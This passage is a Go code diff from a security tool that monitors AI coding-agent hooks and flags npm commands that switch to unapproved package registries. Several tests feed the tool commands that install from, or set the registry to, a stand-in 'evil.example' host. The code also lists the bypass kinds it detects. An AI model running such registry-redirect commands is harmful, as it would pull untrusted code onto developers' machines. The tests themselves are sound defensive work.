string(event.HookPhasePostTool), + "HookPhasePostToolFailure": string(event.HookPhasePostToolFailure), + "HookPhasePermissionRequest": string(event.HookPhasePermissionRequest), + "HookPhasePermissionDenied": string(event.HookPhasePermissionDenied), + "HookPhaseElicitation": string(event.HookPhaseElicitation), + "HookPhaseElicitationResult": string(event.HookPhaseElicitationResult), + "HookPhaseUserPrompt": string(event.HookPhaseUserPrompt), + "HookPhaseSessionStart": string(event.HookPhaseSessionStart), + "HookPhaseSessionEnd": string(event.HookPhaseSessionEnd), + "HookPhaseNotification": string(event.HookPhaseNotification), + "HookPhaseStop": string(event.HookPhaseStop), + "HookPhaseSubagentStop": string(event.HookPhaseSubagentStop), + } + want := map[string]string{ + "ActionFileRead": "file_read", + "ActionFileWrite": "file_write", + "ActionFileDelete": "file_delete", + "ActionCommandExec": "command_exec", + "ActionNetworkRequest": "network_request", + "ActionToolUse": "tool_use", + "ActionMCPInvocation": "mcp_invocation", + "ResultObserved": "observed", + "ResultSuccess": "success", + "ResultError": "error", + "ResultTimeout": "timeout", + "ResultPartial": "partial", + "HookPreToolUse": "PreToolUse", + "HookPostToolUse": "PostToolUse", + "HookPostToolUseFailure": "PostToolUseFailure", + "HookSessionStart": "SessionStart", + "HookSessionEnd": "SessionEnd", + "HookNotification": "Notification", + "HookStop": "Stop", + "HookSubagentStop": "SubagentStop", + "HookUserPrompt": "UserPromptSubmit", + "HookElicitation": "Elicitation", + "HookElicitationResult": "ElicitationResult", + "HookPermissionRequest": "PermissionRequest", + "HookPermissionDenied": "PermissionDenied", + "HookPhaseUnknown": "unknown", + "HookPhasePreTool": "pre_tool", + "HookPhasePostTool": "post_tool", + "HookPhasePostToolFailure": "post_tool_failure", + "HookPhasePermissionRequest": "permission_request", + "HookPhasePermissionDenied": "permission_denied", + "HookPhaseElicitation": "elicitation", + "HookPhaseElicitationResult": "elicitation_result", + "HookPhaseUserPrompt": "user_prompt", + "HookPhaseSessionStart": "session_start", + "HookPhaseSessionEnd": "session_end", + "HookPhaseNotification": "notification", + "HookPhaseStop": "stop", + "HookPhaseSubagentStop": "subagent_stop", + } + for name, got := range cases { + if got != want[name] { + t.Errorf("%s wire value = %q, want %q", name, got, want[name]) + } + } +} + +func TestEventFullRoundTrip(t *testing.T) { + // Schema-drift detector: populate every field, marshal, unmarshal, + // reflect.DeepEqual. If anyone adds a field without giving it + // (de)serialization coverage on both sides, this fails. + in := &event.Event{ + SchemaVersion: event.SchemaVersion, + EventID: "deadbeef", + Timestamp: time.Date(2026, 5, 5, 12, 0, 0, 123456789, time.UTC), + AgentName: "claude-code", + AgentVersion: "1.2.3", + HookEvent: event.HookPreToolUse, + HookPhase: event.HookPhasePreTool, + SessionID: "sess-1", + WorkingDirectory: "/tmp/work", + PermissionMode: "default", + CustomerID: "cust-1", + UserIdentity: "alice@example.com", + DeviceID: "dev-1", + ActionType: event.ActionCommandExec, + ToolName: "Bash", + ToolUseID: "use-1", + ResultStatus: event.ResultObserved, + IsSensitive: true, + Payload: map[string]any{"k": "v"}, + Classifications: &event.Classifications{ + IsShellCommand: true, + IsPackageManager: true, + IsMCPRelated: true, + IsFileOperation: true, + IsNetworkActivity: true, + }, + Enrichments: &event.Enrichments{ + Shell: &event.ShellEnrichment{ + Command: "echo hi", + CommandTruncated: false, + WorkingDirectory: "/tmp", + }, + PackageManager: &event.PackageManagerInfo{ + Detected: true, + Name: "npm", + CommandKind: "install", + Registry: "https://registry.npmjs.org", + ConfigSources: []string{".npmrc"}, + PackagesAdded: []event.PackageRef{{Name: "foo", Version: "1.0.0"}}, + PackagesRemoved: []event.PackageRef{{Name: "bar"}}, + PackagesChanged: []event.PackageRef{{Name: "baz", Version: "2.0.0"}}, + Confidence: "high", + Evidence: []string{"package.json"}, + }, + MCP: &event.MCPInfo{ + Kind: "local", + ServerName: "server-foo", + ServerCommand: "npx -y @modelcontextprotocol/server-foo", + }, + Secrets: &event.SecretsScanInfo{ + Scanned: true, + FilesSeen: 3, + BytesSeen: 1024, + Findings: []event.SecretFinding{{ + RuleID: "aws-key", + FilePath: "/tmp/x", + LineStart: 1, + LineEnd: 1, + Fingerprint: "abc", + MaskedPreview: "AKIA…", + Confidence: "high", + }}, + TimedOut: false, + }, + }, + Timeouts: []event.TimeoutInfo{{ + Stage: "enrich", + Cap: 5 * time.Second, + Elapsed: 6 * time.Second, + }}, + Errors: []event.ErrorInfo{{ + Stage: "redact", + Code: "regex_overflow", + Message: "pattern too long", + }}, + PolicyDecision: &event.PolicyDecisionInfo{ + Mode: "audit", + Allowed: true, + WouldBlock: true, + Enforced: false, + Code: "blocked_pkg", + InternalDetail: "matched rule X", + Registry: "npm", + AllowlistHit: false, + Bypass: "registry_flag", + }, + } + out, err := json.Marshal(in) + if err != nil { + t.Fatal(err) + } + var got event.Event + if err := json.Unmarshal(out, &got); err != nil { + t.Fatal(err) + } + if !reflect.DeepEqual(in, &got) { + t.Errorf("round-trip mismatch.\n in = %+v\nout = %+v", in, &got) + } +} + +func TestPackageManagerInfo_AlwaysEmitsDetected(t *testing.T) { + // PackageManagerInfo.Detected has no omitempty by design — even a + // negative detection ("we ran the package-manager classifier; nothing + // matched") is meaningful to downstream pipelines. Guard the absence + // of omitempty. + out, err := json.Marshal(event.PackageManagerInfo{Detected: false}) + if err != nil { + t.Fatal(err) + } + if !strings.Contains(string(out), `"detected":false`) { + t.Errorf("expected detected:false to appear in %s", string(out)) + } +} + +func TestSecretsScanInfo_AlwaysEmitsCounters(t *testing.T) { + // Scanned/FilesSeen/BytesSeen have no omitempty — a session-end with + // zero files seen is still a meaningful "we scanned and found nothing" + // signal. Guard the absence of omitempty. + out, err := json.Marshal(event.SecretsScanInfo{}) + if err != nil { + t.Fatal(err) + } + got := string(out) + for _, want := range []string{`"scanned":false`, `"files_seen":0`, `"bytes_seen":0`} { + if !strings.Contains(got, want) { + t.Errorf("expected %s in %s", want, got) + } + } +} + +func TestPolicyDecisionInfo_AlwaysEmitsAllowedAndAllowlistHit(t *testing.T) { + // Allowed and AllowlistHit have no omitempty: every policy decision + // must answer both questions explicitly, even when both are false. + out, err := json.Marshal(event.PolicyDecisionInfo{}) + if err != nil { + t.Fatal(err) + } + got := string(out) + for _, want := range []string{`"allowed":false`, `"allowlist_hit":false`} { + if !strings.Contains(got, want) { + t.Errorf("expected %s in %s", want, got) + } + } +} + +func TestEnrichments_NilSubBlocksOmitted(t *testing.T) { + // All Enrichments sub-fields are pointers with omitempty — a top-level + // Enrichments with no sub-blocks should marshal to {}, not to a struct + // with `null` keys. + out, err := json.Marshal(event.Enrichments{}) + if err != nil { + t.Fatal(err) + } + if string(out) != "{}" { + t.Errorf("empty Enrichments should marshal to {}, got %s", string(out)) + } +} + +func TestPolicyBypassValues_RoundTrip(t *testing.T) { + // The five documented bypass tags must round-trip as plain strings. + // They are part of the audit wire format. + for _, tag := range []string{"registry_flag", "env_var", "config_set", "config_edit", "userconfig_flag"} { + t.Run(tag, func(t *testing.T) { + in := event.PolicyDecisionInfo{Bypass: tag} + out, err := json.Marshal(in) + if err != nil { + t.Fatal(err) + } + if !strings.Contains(string(out), `"bypass":"`+tag+`"`) { + t.Errorf("bypass %q missing from %s", tag, string(out)) + } + var back event.PolicyDecisionInfo + if err := json.Unmarshal(out, &back); err != nil { + t.Fatal(err) + } + if back.Bypass != tag { + t.Errorf("round-trip lost bypass tag: got %q want %q", back.Bypass, tag) + } + }) + } +} + +func TestTimestampIsRFC3339Nano(t *testing.T) { + // Backend parses timestamp as RFC3339Nano (Go's default time.Time + // marshal). Pin it so a switch to a custom MarshalJSON would fail + // the test. + ev := event.Event{ + SchemaVersion: event.SchemaVersion, + EventID: "x", + Timestamp: time.Date(2026, 5, 5, 12, 0, 0, 123456789, time.UTC), + AgentName: "claude-code", + HookEvent: event.HookPreToolUse, + ResultStatus: event.ResultObserved, + } + out, err := json.Marshal(ev) + if err != nil { + t.Fatal(err) + } + want := `"timestamp":"2026-05-05T12:00:00.123456789Z"` + if !strings.Contains(string(out), want) { + t.Errorf("expected %s in %s", want, string(out)) + } +} + +func TestPolicyDecisionInfoTruthTable(t *testing.T) { + // Verify the truth-table documented on PolicyDecisionInfo round-trips + // through JSON cleanly. Only audit rows are emitted in production; + // the block row is exercised by tests so block-mode flip is a flag + // flip, not a shape change. + cases := []struct { + name string + info event.PolicyDecisionInfo + want []string // substrings that must appear + }{ + { + name: "audit no violation", + info: event.PolicyDecisionInfo{Mode: "audit", Allowed: true}, + want: []string{`"mode":"audit"`, `"allowed":true`}, + }, + { + name: "audit violation", + info: event.PolicyDecisionInfo{Mode: "audit", Allowed: true, WouldBlock: true}, + want: []string{`"would_block":true`, `"allowed":true`}, + }, + { + name: "block violation", + info: event.PolicyDecisionInfo{Mode: "block", Allowed: false, WouldBlock: true, Enforced: true}, + want: []string{`"allowed":false`, `"enforced":true`, `"would_block":true`}, + }, + } + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + out, err := json.Marshal(tc.info) + if err != nil { + t.Fatal(err) + } + got := string(out) + for _, w := range tc.want { + if !strings.Contains(got, w) { + t.Errorf("missing %s in %s", w, got) + } + } + }) + } +} diff --git a/internal/aiagents/hook/codex_test.go b/internal/aiagents/hook/codex_test.go new file mode 100644 index 0000000..2231eda --- /dev/null +++ b/internal/aiagents/hook/codex_test.go @@ -0,0 +1,192 @@ +package hook + +import ( + "bytes" + "context" + "encoding/json" + "strings" + "testing" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter/codex" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/policy" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +func newCodexRuntime(t *testing.T, payload string, pol *policy.Policy) (*Runtime, *captured, *bytes.Buffer) { + t.Helper() + cap := &captured{} + stdout := &bytes.Buffer{} + rt := &Runtime{ + Adapter: codex.New(t.TempDir(), "/usr/local/bin/stepsecurity-dev-machine-guard"), + Exec: executor.NewMock(), + Stdin: strings.NewReader(payload), + Stdout: stdout, + Stderr: &bytes.Buffer{}, + Now: func() time.Time { return time.Now().UTC() }, + Policy: pol, + UploadEvent: cap.capture(), + LogError: cap.logError(), + } + return rt, cap, stdout +} + +func runCodex(t *testing.T, hook event.HookEvent, payload string, pol *policy.Policy) (map[string]any, *event.Event) { + t.Helper() + rt, cap, stdout := newCodexRuntime(t, payload, pol) + _ = rt.Run(context.Background(), hook) + var resp map[string]any + if err := json.Unmarshal(bytes.TrimSpace(stdout.Bytes()), &resp); err != nil { + t.Fatalf("stdout not JSON: %v: %q", err, stdout.Bytes()) + } + if len(cap.events) == 0 { + return resp, nil + } + ev := cap.events[0] + return resp, &ev +} + +// Codex allow path emits {} on every hook event. +func TestCodexAllowEmitsEmptyObject(t *testing.T) { + resp, ev := runCodex(t, codex.HookPreToolUse, `{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"Bash", + "tool_input":{"command":"ls"} + }`, nil) + if len(resp) != 0 { + t.Errorf("allow response must be {}, got %v", resp) + } + if ev == nil { + t.Fatal("expected 1 event captured") + } + if ev.AgentName != "codex" { + t.Errorf("agent_name: %v", ev.AgentName) + } +} + +// Codex PreToolUse Bash with package-manager violation reaches policy +// (PreTool phase + command_exec) and persists allowed=true under audit +// mode. Wire response stays {}. +func TestCodexAuditPolicyViolationAllowsAndPersists(t *testing.T) { + resp, ev := runCodex(t, codex.HookPreToolUse, `{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"Bash", + "tool_input":{"command":"npm install lodash --registry=https://evil.example.com"} + }`, nil) + if len(resp) != 0 { + t.Errorf("audit-mode block must still emit {}, got %v", resp) + } + pd := ev.PolicyDecision + if pd == nil { + t.Fatalf("expected policy_decision: %+v", ev) + } + if !pd.Allowed { + t.Errorf("audit mode must allow: %+v", pd) + } + if !pd.WouldBlock { + t.Errorf("expected would_block=true: %+v", pd) + } + if pd.Enforced { + t.Errorf("audit mode must not enforce: %+v", pd) + } +} + +// Codex block-mode PreToolUse policy violation renders the Codex deny +// shape (NOT Claude's continue/suppressOutput shape). +func TestCodexBlockPreToolUseEmitsCodexDeny(t *testing.T) { + pol := policy.Builtin() + pol.Mode = policy.ModeBlock + resp, _ := runCodex(t, codex.HookPreToolUse, `{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"Bash", + "tool_input":{"command":"npm install lodash --registry=https://evil.example.com"} + }`, &pol) + hso, ok := resp["hookSpecificOutput"].(map[string]any) + if !ok { + t.Fatalf("expected hookSpecificOutput, got %v", resp) + } + if hso["hookEventName"] != "PreToolUse" { + t.Errorf("hookEventName: %v", hso["hookEventName"]) + } + if hso["permissionDecision"] != "deny" { + t.Errorf("permissionDecision: %v", hso["permissionDecision"]) + } + for _, banned := range []string{"continue", "suppressOutput", "stopReason", "decision"} { + if _, has := resp[banned]; has { + t.Errorf("Codex block response must not include %q, got %v", banned, resp) + } + } +} + +// PermissionRequest carrying a Bash payload must NOT trigger +// package-manager policy because action_type is empty. +func TestCodexPermissionRequestSkipsPolicy(t *testing.T) { + pol := policy.Builtin() + pol.Mode = policy.ModeBlock + resp, ev := runCodex(t, codex.HookPermissionRequest, `{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"Bash", + "tool_input":{"command":"npm install lodash --registry=https://evil.example.com"} + }`, &pol) + if len(resp) != 0 { + t.Errorf("PermissionRequest must emit {}, got %v", resp) + } + if ev != nil && ev.PolicyDecision != nil { + t.Errorf("PermissionRequest must not evaluate policy: %+v", ev.PolicyDecision) + } +} + +// PostToolUse must not block even with a block decision because +// post_tool side effects already happened. +func TestCodexPostToolUseNeverBlocks(t *testing.T) { + pol := policy.Builtin() + pol.Mode = policy.ModeBlock + resp, _ := runCodex(t, codex.HookPostToolUse, `{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"Bash", + "tool_input":{"command":"npm install lodash --registry=https://evil.example.com"}, + "tool_response":"ok" + }`, &pol) + if len(resp) != 0 { + t.Errorf("PostToolUse must always emit {}, got %v", resp) + } +} + +// apply_patch's tool_input.command is a patch payload, not shell input. +// npm policy must not see it even when patch text contains "npm install". +func TestCodexApplyPatchDoesNotTriggerNpmPolicy(t *testing.T) { + pol := policy.Builtin() + pol.Mode = policy.ModeBlock + resp, ev := runCodex(t, codex.HookPreToolUse, `{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"apply_patch", + "tool_input":{"command":"*** Begin Patch\nnpm install lodash --registry=https://evil.example.com"} + }`, &pol) + if len(resp) != 0 { + t.Errorf("apply_patch must not block, got %v", resp) + } + if ev != nil && ev.PolicyDecision != nil { + t.Errorf("apply_patch must not evaluate policy: %+v", ev.PolicyDecision) + } +} + +// Unknown Codex hook still returns {} with HookPhaseUnknown. +func TestCodexUnknownHookReturnsEmpty(t *testing.T) { + resp, ev := runCodex(t, "BogusEvent", `{}`, nil) + if len(resp) != 0 { + t.Errorf("unknown hook must emit {}, got %v", resp) + } + if ev == nil { + t.Fatal("expected event captured") + } + if ev.HookPhase != event.HookPhaseUnknown { + t.Errorf("unknown hook phase: %v", ev.HookPhase) + } +} diff --git a/internal/aiagents/hook/policy.go b/internal/aiagents/hook/policy.go new file mode 100644 index 0000000..02a8e86 --- /dev/null +++ b/internal/aiagents/hook/policy.go @@ -0,0 +1,149 @@ +package hook + +import ( + "context" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/policy" +) + +// shouldEvaluatePolicy is the cheap filter that runs before any I/O. +// It is normalized over hook_phase so future agents reuse it without +// branching on Claude-specific hook names. +func shouldEvaluatePolicy(ev *event.Event, cmd string) bool { + if ev == nil { + return false + } + if ev.HookPhase != event.HookPhasePreTool { + return false + } + if ev.ActionType != event.ActionCommandExec { + return false + } + return cmd != "" +} + +// evaluatePolicy is the stage between enrichment and upload. It returns +// (nil, AllowDecision) when the observed binary does not belong to a +// known ecosystem, when the ecosystem block is disabled, when the command +// is not policy-relevant, or when any internal step fails — fail-open is +// preserved on every error path. +// +// The returned adapter.Decision is the *effective* response. The +// evaluator forces ModeAudit before consulting the verdict, so block +// decisions never escape this function. The block code path remains +// exercised by tests that inject a Policy with Mode=block; production +// builds never set it. +func (rt *Runtime) evaluatePolicy(_ context.Context, ev *event.Event, cmd string) (*event.PolicyDecisionInfo, adapter.Decision) { + allow := adapter.AllowDecision() + + if cmd == "" { + return nil, allow + } + + pol := policy.Builtin() + if rt.Policy != nil { + pol = *rt.Policy + } + + parsed := policy.ParseShell(cmd) + eco := policy.EcosystemFor(parsed.Binary) + if eco == "" { + return nil, allow + } + if block, ok := pol.Ecosystems[eco]; !ok || !block.Enabled { + return nil, allow + } + + req := policy.Request{ + Ecosystem: eco, + PackageManager: normalizePM(parsed.Binary), + CommandKind: commandKindFor(parsed, ev), + RegistryFlag: parsed.RegistryFlag, + UserconfigFlag: parsed.UserconfigFlag, + InlineEnv: parsed.InlineEnv, + } + if parsed.ConfigOp != "" { + req.ConfigKeyMutated = parsed.ConfigKey + req.ConfigValue = parsed.ConfigValue + } + + if ev.Enrichments != nil && ev.Enrichments.PackageManager != nil { + req.Registry = ev.Enrichments.PackageManager.Registry + } + + verdict := policy.Eval(pol, req) + mode := policy.ResolveMode(pol) + wouldBlock := !verdict.Allow + enforced := wouldBlock && mode == policy.ModeBlock + + info := &event.PolicyDecisionInfo{ + Mode: string(mode), + Allowed: !enforced, + WouldBlock: wouldBlock, + Enforced: enforced, + Code: string(verdict.Code), + InternalDetail: verdict.InternalDetail, + Registry: req.Registry, + AllowlistHit: verdict.Allow && req.Registry != "", + Bypass: bypassFor(verdict.Code), + } + if enforced { + return info, adapter.Decision{Allow: false, UserMessage: verdict.UserMessage} + } + return info, allow +} + +// commandKindFor maps a parsed-shell shape onto the policy.Request kind +// vocabulary. Config ops win because the parser detects them with high +// specificity; otherwise we fall back to whatever npm.Enrich classified. +func commandKindFor(parsed policy.ParsedCommand, ev *event.Event) string { + switch parsed.ConfigOp { + case "set": + return "config_set" + case "delete": + return "config_delete" + case "edit": + return "config_edit" + } + if ev.Enrichments != nil && ev.Enrichments.PackageManager != nil { + if k := ev.Enrichments.PackageManager.CommandKind; k != "" { + return k + } + } + return "other" +} + +// normalizePM collapses execution-only siblings onto their config-owning +// counterpart so managed-key lookups in policy.Eval find the right table. +// `npx` does not own configuration; `npm` does. +func normalizePM(bin string) string { + switch bin { + case "npx": + return "npm" + case "pnpx": + return "pnpm" + case "bunx": + return "bun" + } + return bin +} + +// bypassFor maps a policy decision code onto the audit-only Bypass tag. +// Returns "" for non-bypass codes (allow, missing data, etc). +func bypassFor(code policy.DecisionCode) string { + switch code { + case policy.CodeRegistryFlag: + return "registry_flag" + case policy.CodeRegistryEnv: + return "env_var" + case policy.CodeUserconfigFlag: + return "userconfig_flag" + case policy.CodeManagedKeyMutation: + return "config_set" + case policy.CodeManagedKeyEdit: + return "config_edit" + } + return "" +} diff --git a/internal/aiagents/hook/policy_test.go b/internal/aiagents/hook/policy_test.go new file mode 100644 index 0000000..82b64c3 --- /dev/null +++ b/internal/aiagents/hook/policy_test.go @@ -0,0 +1,368 @@ +package hook + +import ( + "bytes" + "context" + "encoding/json" + "strings" + "testing" + "time" + + cc "github.com/step-security/dev-machine-guard/internal/aiagents/adapter/claudecode" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/policy" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// builtinAllowedRegistry mirrors the single-element allowlist shipped in +// internal/aiagents/policy/builtin/policy.json. The hook now enforces the +// embedded policy unconditionally, so tests assert against that allowlist +// directly. +const builtinAllowedRegistry = "https://registry.stepsecurity.io/" + +func runWith(t *testing.T, payload string, hookType event.HookEvent) (map[string]any, *event.Event) { + t.Helper() + return runWithPolicy(t, payload, hookType, nil) +} + +func runWithPolicy(t *testing.T, payload string, hookType event.HookEvent, pol *policy.Policy) (map[string]any, *event.Event) { + t.Helper() + stdin := strings.NewReader(payload) + var stdout, stderr bytes.Buffer + cap := &captured{} + rt := &Runtime{ + Adapter: cc.New(t.TempDir(), "/usr/local/bin/stepsecurity-dev-machine-guard"), + Exec: executor.NewMock(), + Stdin: stdin, + Stdout: &stdout, + Stderr: &stderr, + Now: func() time.Time { return time.Now().UTC() }, + Policy: pol, + UploadEvent: cap.capture(), + LogError: cap.logError(), + } + _ = rt.Run(context.Background(), hookType) + var resp map[string]any + if err := json.Unmarshal(bytes.TrimSpace(stdout.Bytes()), &resp); err != nil { + t.Fatalf("stdout not JSON: %v: %q", err, stdout.Bytes()) + } + if len(cap.events) == 0 { + return resp, nil + } + ev := cap.events[0] + return resp, &ev +} + +// blockModePolicy returns a copy of the embedded policy with mode=block. +func blockModePolicy() *policy.Policy { + p := policy.Builtin() + p.Mode = policy.ModeBlock + return &p +} + +// expectAllowResponse asserts the wire-format is allow. +func expectAllowResponse(t *testing.T, resp map[string]any) { + t.Helper() + if resp["continue"] != true { + t.Errorf("expected continue=true, got %v", resp) + } + if _, ok := resp["decision"]; ok { + t.Errorf("allow response must not carry decision field, got %v", resp) + } +} + +// expectBlockResponse asserts the spec-compliant PreToolUse block shape: +// hookSpecificOutput.permissionDecision="deny" plus a generic reason. +// MUST NOT contain continue:false (which would halt the agent entirely) +// nor the deprecated top-level decision/reason/stopReason fields. +func expectBlockResponse(t *testing.T, resp map[string]any) { + t.Helper() + if v, ok := resp["continue"]; ok && v == false { + t.Errorf("block response must not emit continue:false (halts agent), got %v", resp) + } + for _, k := range []string{"decision", "reason", "stopReason"} { + if _, ok := resp[k]; ok { + t.Errorf("block response must not carry deprecated field %q, got %v", k, resp) + } + } + hso, ok := resp["hookSpecificOutput"].(map[string]any) + if !ok { + t.Fatalf("block response missing hookSpecificOutput: %v", resp) + } + if hso["hookEventName"] != "PreToolUse" { + t.Errorf("hookEventName: %v", hso["hookEventName"]) + } + if hso["permissionDecision"] != "deny" { + t.Errorf("permissionDecision: %v", hso["permissionDecision"]) + } + reason, _ := hso["permissionDecisionReason"].(string) + if !strings.Contains(reason, "Blocked by your organization") { + t.Errorf("permissionDecisionReason not generic block message: %v", reason) + } +} + +// Test 1: Built-in policy defaults to audit; a violation persists a finding +// and emits an allow response (Allowed reflects the effective response). +func TestAuditDefaultRegistryFlagViolationAllowsAndAudits(t *testing.T) { + resp, ev := runWith(t, `{"tool_name":"Bash","tool_input":{"command":"npm install --registry=https://evil.example/ lodash"}}`, event.HookPreToolUse) + + expectAllowResponse(t, resp) + + pd := ev.PolicyDecision + if pd == nil { + t.Fatalf("policy_decision missing: %+v", ev) + } + if pd.Mode != "audit" { + t.Errorf("mode: %v", pd.Mode) + } + if !pd.Allowed { + t.Errorf("audit-mode allowed must reflect effective response (true), got %v", pd.Allowed) + } + if !pd.WouldBlock { + t.Errorf("would_block: %v", pd.WouldBlock) + } + if pd.Enforced { + t.Errorf("enforced must be false in audit mode, got %v", pd.Enforced) + } + if pd.Bypass != "registry_flag" { + t.Errorf("bypass: %v", pd.Bypass) + } + if !strings.Contains(pd.InternalDetail, "evil.example") { + t.Errorf("internal_detail should name the registry: %v", pd.InternalDetail) + } + // Audit-mode wire response is allow; no place for detail to leak. + if _, ok := resp["hookSpecificOutput"]; ok { + t.Errorf("audit-mode response must not carry hookSpecificOutput, got %v", resp) + } +} + +// Test 2: Audit-mode managed-key mutation persists a finding and allows. +func TestAuditDefaultManagedKeyMutationAllowsAndAudits(t *testing.T) { + resp, ev := runWith(t, `{"tool_name":"Bash","tool_input":{"command":"npm config set registry https://evil.example/"}}`, event.HookPreToolUse) + + expectAllowResponse(t, resp) + + pd := ev.PolicyDecision + if pd == nil { + t.Fatalf("policy_decision missing: %+v", ev) + } + if !pd.Allowed { + t.Errorf("audit-mode allowed: %v", pd.Allowed) + } + if !pd.WouldBlock { + t.Errorf("would_block: %v", pd.WouldBlock) + } + if pd.Mode != "audit" { + t.Errorf("mode: %v", pd.Mode) + } +} + +// Test 3: Block-mode registry violation persists enforced=true and emits block. +func TestBlockModeRegistryFlagViolationBlocks(t *testing.T) { + resp, ev := runWithPolicy(t, `{"tool_name":"Bash","tool_input":{"command":"npm install --registry=https://evil.example/ lodash"}}`, event.HookPreToolUse, blockModePolicy()) + + expectBlockResponse(t, resp) + leak := func(s string) bool { + return strings.Contains(s, "evil.example") || strings.Contains(s, "lodash") || strings.Contains(s, "npmrc") + } + hso, _ := resp["hookSpecificOutput"].(map[string]any) + pdr, _ := hso["permissionDecisionReason"].(string) + if leak(pdr) { + t.Errorf("block-mode permissionDecisionReason leaked detail: %q", pdr) + } + + pd := ev.PolicyDecision + if pd == nil { + t.Fatalf("policy_decision missing: %+v", ev) + } + if pd.Mode != "block" { + t.Errorf("mode: %v", pd.Mode) + } + if pd.Allowed { + t.Errorf("block-mode allowed must reflect effective response (false), got %v", pd.Allowed) + } + if !pd.WouldBlock { + t.Errorf("would_block: %v", pd.WouldBlock) + } + if !pd.Enforced { + t.Errorf("enforced: %v", pd.Enforced) + } + if pd.Bypass != "registry_flag" { + t.Errorf("bypass: %v", pd.Bypass) + } + if !strings.Contains(pd.InternalDetail, "evil.example") { + t.Errorf("internal_detail should name the registry: %v", pd.InternalDetail) + } +} + +// Test 4: Block-mode managed-key mutation blocks. +func TestBlockModeManagedKeyMutationBlocks(t *testing.T) { + resp, ev := runWithPolicy(t, `{"tool_name":"Bash","tool_input":{"command":"npm config set registry https://evil.example/"}}`, event.HookPreToolUse, blockModePolicy()) + + expectBlockResponse(t, resp) + + pd := ev.PolicyDecision + if pd == nil || !pd.Enforced || pd.Allowed { + t.Errorf("expected enforced block, got %+v", pd) + } +} + +func TestPolicyUsesEnrichmentRegistry(t *testing.T) { + rt := &Runtime{Policy: blockModePolicy()} + ev := &event.Event{ + HookEvent: event.HookPreToolUse, + ActionType: event.ActionCommandExec, + Payload: map[string]any{ + "tool_input": map[string]any{"command": "npm install lodash"}, + }, + Enrichments: &event.Enrichments{ + PackageManager: &event.PackageManagerInfo{ + Detected: true, + Name: "npm", + CommandKind: "install", + Registry: "https://evil.example/", + }, + }, + } + + info, decision := rt.evaluatePolicy(context.Background(), ev, "npm install lodash") + + if info == nil { + t.Fatal("expected policy decision") + } + if info.Registry != "https://evil.example/" { + t.Errorf("registry: %q", info.Registry) + } + if decision.Allow { + t.Errorf("expected block decision") + } +} + +// A synthetic future-agent event that carries a non-Claude native hook +// name still evaluates policy because the gate is normalized over +// HookPhase. This pins the multi-agent invariant: policy never branches +// on agent-specific HookEvent values. +func TestPolicyGateUsesHookPhaseNotNativeName(t *testing.T) { + rt := &Runtime{Policy: blockModePolicy()} + cmd := "npm install --registry=https://evil.example/ x" + ev := &event.Event{ + HookEvent: "tool.execute.before", // not any Claude constant + HookPhase: event.HookPhasePreTool, + ActionType: event.ActionCommandExec, + Enrichments: &event.Enrichments{ + PackageManager: &event.PackageManagerInfo{ + Detected: true, Name: "npm", CommandKind: "install", + }, + }, + } + if !shouldEvaluatePolicy(ev, cmd) { + t.Fatal("phase-based gate must pass for pre_tool + command_exec + cmd") + } + info, decision := rt.evaluatePolicy(context.Background(), ev, cmd) + if info == nil || decision.Allow { + t.Fatalf("expected block decision for phase-driven evaluation: info=%v decision=%v", info, decision) + } + + // And the gate must reject events whose phase is wrong, even when the + // shell command and action_type would otherwise fit. + ev.HookPhase = event.HookPhasePostTool + if shouldEvaluatePolicy(ev, cmd) { + t.Errorf("post_tool phase must not trigger policy") + } +} + +// Test 5: Audit allowlisted flag → no violation; allowed:true, would_block:false. +func TestAuditAllowlistedFlagNoFinding(t *testing.T) { + resp, ev := runWith(t, `{"tool_name":"Bash","tool_input":{"command":"npm install --registry=`+builtinAllowedRegistry+` lodash"}}`, event.HookPreToolUse) + + expectAllowResponse(t, resp) + + pd := ev.PolicyDecision + if pd == nil || !pd.Allowed { + t.Errorf("expected allowed=true on allowlisted flag, got %+v", pd) + } + if pd != nil && pd.WouldBlock { + t.Errorf("would_block should be false, got %v", pd.WouldBlock) + } +} + +// Test 6: Disabled ecosystem emits no policy_decision (no noise). +func TestDisabledEcosystemSuppressesPolicyDecision(t *testing.T) { + pol := policy.Builtin() + npm := pol.Ecosystems[policy.EcosystemNPM] + npm.Enabled = false + pol.Ecosystems[policy.EcosystemNPM] = npm + + resp, ev := runWithPolicy(t, `{"tool_name":"Bash","tool_input":{"command":"npm install --registry=https://evil.example/ lodash"}}`, event.HookPreToolUse, &pol) + + expectAllowResponse(t, resp) + if ev.PolicyDecision != nil { + t.Errorf("disabled ecosystem must not emit policy_decision, got %+v", ev.PolicyDecision) + } +} + +// Test 7: PostToolUse never evaluates policy. +func TestPolicySkipsPostToolUse(t *testing.T) { + resp, ev := runWith(t, `{"tool_name":"Bash","tool_input":{"command":"npm install --registry=https://evil.example/ lodash"}}`, event.HookPostToolUse) + + expectAllowResponse(t, resp) + if ev.PolicyDecision != nil { + t.Errorf("policy stage should not run for PostToolUse: %+v", ev.PolicyDecision) + } +} + +// Test 8: Unknown ecosystem produces no policy_decision. +func TestPolicySkipsUnknownEcosystem(t *testing.T) { + resp, ev := runWith(t, `{"tool_name":"Bash","tool_input":{"command":"pip install foo"}}`, event.HookPreToolUse) + + expectAllowResponse(t, resp) + if ev.PolicyDecision != nil { + t.Errorf("policy_decision should not be present for unenforced ecosystem: %+v", ev.PolicyDecision) + } +} + +// Regression: when CLI arg disagrees with payload hook_event_name, the +// runtime must use one hook type for both policy evaluation and response +// rendering. The invoked CLI hook is authoritative; the payload mismatch +// is audit evidence only. +func TestHookEventNameMismatchKeepsPolicyAndResponseInSync(t *testing.T) { + // CLI arg = PreToolUse, payload says PostToolUse. Since the 